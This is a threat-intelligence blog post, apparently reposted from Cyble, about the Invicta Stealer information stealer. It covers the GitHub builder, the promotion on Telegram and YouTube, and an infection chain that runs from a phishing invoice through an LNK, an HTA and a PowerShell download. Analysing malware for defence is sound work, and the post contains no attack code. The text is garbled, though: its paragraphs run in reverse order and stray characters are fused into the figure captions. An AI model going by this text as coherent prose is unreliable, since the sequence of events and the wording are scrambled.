Figure 9 – Invicta Stealer Infection Chainįor our analysis of Invicta stealer capabilities, we obtained a 64-bit GUI binary of the malicious Invicta Stealer from the wild. The figure below depicts the entire infection chain of the Invicta stealer, illustrating the step-by-step progression from the initial infection to the delivery of the final payload. The figure below shows the malicious PowerShell Command. The PowerShell script is responsible for downloading an extremely malicious Invicta Stealer disguised as “Invoice_MT103_Payment.exe”. This HTA file contains VBScript code that, in turn, executes a PowerShell script. Figure 7 – Details of the Malicious Link File HTA file hosted on the TAs Discord server. LNK file, it triggers a PowerShell command that runs a. Inside the “Invoice.zip” archive file, there is a shortcut file named “INVOICE_MT103.lnk”. Figure 6 – Browser Redirecting to Download Compressed File The figure below illustrates the HTML page’s redirection process to the Discord URL to download “Invoice.zip”. Upon opening the phishing HTML page, users are instantly redirected to a Discord URL, initiating the download of a file named “Invoice.zip”. The figure below shows the phishing HTML page. The infection begins with a spam email with a deceptive HTML page designed to appear as an authentic refund invoice from GoDaddy, aiming to trick the recipients. Figure 4 – Increased Activity of Invicta Stealer The figure below shows the statistics of Invicta Stealer samples identified in the wild. Figure 3 – Invicta Stealer BuilderĬRIL has noticed a significant increase in the prevalence of the Invicta Stealer due to its builder availability on the GitHub page, leading to numerous TAs actively employing it to infect unsuspecting users. The figure below illustrates the Invicta Stealer builder. When running the builder executable, users are prompted to input a Discord webhook or server URL, which serves as the command and control (C&C) mechanism. The GitHub post includes a noteworthy detail: the malware developer generously offers a free stealer builder alongside the provided information. Figure 2 – GitHub Post of Invicta Stealer The GitHub post by the TA, illustrated in the figure below, highlights their active promotion of the Invicta Stealer and its functionalities. The Invicta Stealer can collect system information, system hardware details, wallet data, and browser data and extract information from applications like Steam and Discord. Figure 1 – Invicta Stealer Telegram ChannelĪdditionally, the TA has created a YouTube Channel where they demonstrate a video tutorial detailing the steps to create the Invicta Stealer executable using a builder tool available in the Github repository. The figure below shows the Telegram channel created by TAs to promote the stealer. The developer behind this malware is extensively engaged on social media platforms, utilizing them to promote their information stealer and its lethal capabilities. This pattern underscores the role of social media as a tool for connecting with like-minded individuals and facilitating the pursuit of lucrative cybercrime activities.Ĭyble Research and Intelligence Labs (CRIL) came across a new stealer named Invicta Stealer. The primary motivation behind such actions is to generate monetary gains or seek collaborations for engaging in highly profitable cyber-attacks. It is apparent from past evidence that threat actors (TAs) utilize social media platforms to demonstrate their technical expertise to attract potential allies or customers interested in acquiring or leasing malware families such as Stealers, Ransomware, RATs, and similar tools. Threat Actor Releases Free Builder to Boost Popularity and Inflict Damage
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |